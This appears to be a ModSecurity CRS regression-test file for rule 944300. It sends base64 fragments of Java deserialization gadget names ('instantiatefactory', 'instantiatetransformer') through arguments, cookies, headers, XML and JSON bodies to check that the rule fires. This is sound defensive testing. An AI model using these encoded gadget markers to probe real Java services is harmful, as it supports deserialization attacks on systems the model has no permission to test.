Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-150 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-151 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-152 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-153 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-154 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-155 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-156 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-157 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-158 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-159 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-160 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-161 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-162 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-163 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-164 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-165 + desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-166 + desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-167 + desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-168 + desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-169 + desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-170 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-171 + desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-172 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-173 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + 
output: + log_contains: "id \"944300\"" + - test_title: 944300-174 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-175 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-176 + desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + 
log_contains: "id \"944300\"" + - test_title: 944300-177 + desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-178 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-179 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id 
\"944300\"" + - test_title: 944300-180 + desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-181 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-182 + desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-183 + desc: "Nested XML element value includes 
keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-184 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-185 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-186 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + 
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-187 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-188 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-189 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-190 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" 